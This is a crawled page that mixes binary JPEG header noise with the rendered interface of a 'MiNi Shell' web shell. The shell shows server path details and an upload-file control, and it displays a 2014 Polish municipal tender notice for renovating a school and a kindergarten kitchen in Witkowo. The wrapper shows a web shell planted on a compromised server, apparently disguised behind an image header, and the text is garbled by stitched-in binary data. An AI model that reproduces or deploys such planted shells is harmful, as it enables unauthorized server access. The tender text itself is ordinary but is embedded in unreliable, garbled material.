JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/128096-N-2014.html

<p class="kh_header"><b>Witkowo: Wykonanie remontu w Szkole Podstawowej w Witkowie oraz w Przedszkolu Miejskim przy ul. Jasnej w Witkowie</b><br>
<b>Numer ogłoszenia: 128096 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Witkowo , ul. Gnieźnieńska 1, 62-230 Witkowo, woj. wielkopolskie, tel. 061 4778194, faks 061 4778855.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.witkowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu w Szkole Podstawowej w Witkowie oraz w Przedszkolu Miejskim przy ul. Jasnej w Witkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Część 1: Remont pomieszczeń w Szkole Podstawowej bud. A: sale i pomieszczenia sanitarne.
2) Część 2: Remont pomieszczeń kuchennych w Przedszkolu Miejskim przy ul. Jasnej 
w Witkowie.
Szczegółowy opis znajduje się w: ZAŁĄCZNIKU I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH

UWAGA!
1) Wszystkie zastosowane materiały użyte do realizacji przedmiotu zamówienia muszą być nowe, w 1 gatunku, przeznaczone do stosowania w obiektach użyteczności publicznej i muszą posiadać określone obowiązującymi w tym zakresie polskimi przepisami dopuszczenia do stosowania w obiektach użyteczności publicznej (certyfikaty, atesty, aprobaty techniczne itp.) oraz gwarancje uzyskane od producenta.
Wykonawca zobowiązany jest do przedstawienia w/w dokumentów na każde żądanie Zamawiającego. W/w dokumenty należy przekazać Zamawiającemu przy odbiorze końcowym robót. Kolorystyka wykładzin, płytek i powłok malarskich do uzgodnienia podczas realizacji remontu.

2) Kosztorys ofertowy Wykonawca sporządza na własny koszt w oparciu i zgodnie 
z  przekazanym przez Zamawiającego przedmiarem robót. 
Podane w przedmiarach robót katalogi podstawy wyceny są przykładowe i nie
są wiążące dla celów sporządzania oferty. Wartość oferty wyceniona na podstawie 
ww. dokumentów jest wartością ryczałtową. 
Kosztorys ofertowy ma jedynie charakter pomocniczy i służy do przedstawienia sposobu obliczenia ryczałtowej ceny oferty. 
Nie ujęcie przez Wykonawcę w kosztorysie ofertowym jakiejś pozycji określonej
w przedmiarach robót lub błędne opisanie pozycji czy obmiaru, nie zwalnia Wykonawcy z obowiązku wykonania tych robót, przy czym Wykonawcy nie będzie przysługiwało dodatkowe wynagrodzenie z tego tytułu. Zamawiający uzna, że Wykonawca skalkulował te roboty w innych pozycjach kosztorysu ofertowego.   

3) Jeżeli w SIWZ (wraz z załącznikami) wskazana została nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, itp. równoważnych, o parametrach nie gorszych niż wskazane przez Zamawiającego, które spełniają wymagania norm i przepisów oraz założone parametry projektowe. 

4) W cenie oferty należy uwzględnić wszystkie niezbędne zabezpieczenia miejsc prowadzenia robót przed osobami postronnymi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.43.00.00-0, 45.33.10.00-6, 45.31.12.00-2, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium  2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 
- dla części 1 zamówienia: 2.000,00 zł, słownie: dwa tysiące zł, 
- dla części 2 zamówienia  500,00 zł , słownie: pięćset zł. 
Pozostałe warunki dotyczące wadium określono w SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1:
Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 2 robót budowlanych 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na wykonaniu robót remontowych w budynku/ach za kwotę min. 120.000,00 zł brutto.
Część 2: . Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 2 robót budowlanych 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na wykonaniu robót remontowych w budynku/ach za kwotę min. 20.000,00 zł brutto.
W celu potwierdzenia spełniania niniejszego warunku należy załączyć: 
- Wykaz robót budowlanych, stanowiący załącznik do SIWZ, 
- Dowody potwierdzające wykonanie robót zgodnie z niniejszym warunkiem. Dowodami, 
o których mowa powyżej są poświadczenia lub inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczeń.
Informuję, że w przypadku składania oferty na dwie części zamówienia wystarczy spełnić tylko warunek dla części 1 zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień umowy zgodnie z art. 144 ust. 1 Pzp. może dotyczyć:
a) terminu zakończenia robót - tylko w uzasadnionych przypadkach na prośbę lub za zgodą Zamawiającego:
- istotnej, leżącej po stronie Zamawiającego, zwłoki w przekazaniu placu budowy Wykonawcy, o liczbę dni opóźnienia, wstrzymania robót przez Zamawiającego,
- wystąpienia awarii nie zawinionej czynnościami lub nie wynikającej z zaniechania czynności, do których Wykonawca był zobowiązany,
- działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia,
- wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub powstałych na skutek realizacji zamówień dodatkowych mających wpływ na termin wykonania umowy.
b) zakresu robót i sposobu ich wykonania, które w związku z robotami zamiennymi, dodatkowymi uległyby zmianie, w uzgodnieniu z Wykonawcą w przypadku:
- zaistnienia istotnych okoliczności powodujących, że wykonanie umowy w zakresie przewidzianym przez zamawiającego nie jest możliwe, czego nie można było przewidzieć 
w chwili zawarcia umowy,
- zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych przy realizacji umowy,
- zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
- inne przyczyny zewnętrzne niezależne od zamawiającego oraz wykonawcy skutkujące niemożnością prowadzenia,
c) nieprzewidzianych okoliczności formalno-prawnych,
d) zmiany wysokości wynagrodzenia, w przypadku: zmiany stawki VAT,  zmiany sposobu wykonania robót, ograniczenia zakresu robót, wprowadzenia robót zamiennych o niższej wartości, które nie były przewidziane w chwili zawarcia umowy,
e) zmiany zgłoszonych w ofercie podwykonawców,
f) innych ważnych powodów.
2. Wykonawca zobowiązuje się niezwłocznie poinformować Zamawiającego o zaistnieniu przesłanek stanowiących potrzebę zmiany umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.witkowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta, ul. Gnieźnieńska 1, 62-230 Witkowo, pok. nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2014 godzina 13:00, miejsce: Urząd Gminy i Miasta, ul. Gnieźnieńska 1, 62-230 Witkowo, pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont pomieszczeń w Szkole Podstawowej bud. A: sale i pomieszczenia sanitarne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1) W ramach części należy wykonać prace remontowe  w 10 salach lekcyjnych:  206, 204, 208, 202, 209, 210, 211, 212, 213, 214, polegające na:
- Rozebraniu 2 ścian działowych (s. nr 206, 205, 204).
- Postawieniu ścianki działowej z płyty gk, demontażu drzwi i zamurowaniu otworu drzwiowego (206, 204).
- Wykonaniu posadzki samopoziomującej.
- Wymianie posadzki z parkietu na wykładzinę PCV obiektową.
- Wykonaniu gładzi gipsowych na ścianach i sufitach.
- Dwukrotnym malowaniu ścian i sufitów farbą emulsyjną zmywalną.
- Ługowaniu farby olejnej na wysokości lamperii, malowaniu lakierem wymalowanych ścian do wysokości lamperii 1,5m.
- Montażu odbojników z wykładziny PCV o szer. 35cm.
- Obróbce otworów okiennych.
- Wymianie istniejących gniazd elektrycznych i włączników na nowe oraz wykonaniu dodatkowych gniazd. 
-Wymianie grzejników żeliwnych na płytowe.
- Ponadto w sali nr 215 należy wykonać odbojniki z wykładziny pcv a w Sali nr 207 należy wymienić grzejniki.
1.2) W pomieszczeniach sanitarnych przy świetlicy w bud. A należy wykonać następujące prace:
-Rozbiórkę ścian działowych i wykonanie nowych z osadzeniem nadproży. 
- Montaż  3 szt. drzwi wewnętrznych do wydzielonych pomieszczeń.
- Wymianę instalacji c.o.,  elektrycznej, wodociągowej i kanalizacyjnej.
- Wykonanie posadzki z płytek gresowych o wym. min 40x40 cm.
- Wykonanie okładziny ścian z płytek ceramicznych o wym. ok. 25x40cm do wys. 
1,50 m. 
- Szpachlowanie i 2-krotne malowanie farbą zmywalna sufitu i ścian powyżej wys. licowanych płytkami.
- Montaż 2 szt. kabin systemowych do toalet.
- Montaż 2 szt. umywalek z bateriami, 1 szt. pisuaru i 2 szt. muszki ustępowych typu -kompakt- oraz 2 szt. luster..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.43.00.00-0, 45.31.12.00-2, 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont pomieszczeń kuchennych w Przedszkolu Miejskim przy ul. Jasnej 
w Witkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1) W pomieszczeniach: kuchni, przygotowalni, zmywalni, obieralni należy wykonać następujące prace:
- Skucie płytek z posadzki i ścian.
- Zdemontowanie nieczynnych przewodów wentylacji mechanicznej z blachy wraz 
z obudową, zaślepienie otworów po kanałach i wykonanie zabudowy z płyty gk.
- Wykonanie posadzki samopoziomującej i posadzki z płytek o wym. min. 40x40cm wraz 
z cokolikami o wys.10cm.
- Licowanie ścian płytami ceramicznymi o wym. ok. 25x40cm na wys. 2,00m, (układanymi poziomo).
- Szpachlowanie gipsem i 2-krotne malowanie farbą emulsyjną zmywalną ścian,    
powyżej  powierzchni licowanej płytkami.
- Malowanie sufitów.
- Instalowanie kratek wentylacyjnych.
- Ponadto w pomieszczeniu kuchennym należy zdemontować okap z wyciągiem, zainstalować i podłączyć nowy ze stali nierdzewnej - wykonany na zamówienie 
o wymiarach ok.: 130x180cm, wymalować obudowę dźwigu towarowego farbą olejną.

2.2) W pomieszczeniach: magazynek, korytarz, klatka schodowa należy wykonać następujące prace:
- Dwukrotne malowanie ścian i sufitu farbą emulsyjna zmywalną.
- Jednokrotne malowanie ścian na wysokość lamperii 1,50m farbą olejną.
Ponadto w korytarzu należy zdemontować nieczynne piony wentylacyjne i zaślepić otwory po ich demontażu.

2.3) W pomieszczeniu toalety dla personelu należy wykonać następujące prace:
- Skucie płytek z posadzki i ścian.
- Demontaż urządzeń sanitarnych.
- Wykonanie posadzki samopoziomującej i posadzki z płytek o wym. min. 40x40cm wraz 
z cokolikami o wys.10cm.
- Licowanie ścian płytkami ceramicznymi o wym. ok. 25x40cm.
- Szpachlowanie ścian gipsem i 2-krotne malowanie farbą emulsyjna zmywalną.
- Wykonanie zabudowy z płyty gk.
- Montaż instalacji w bruzdach w ścianach. 
- Zainstalowanie muszli ustępowej typu kompakt, umywalki wraz z baterią, kinkietu 
i  lustra.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.43.00.00-0, 45.33.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com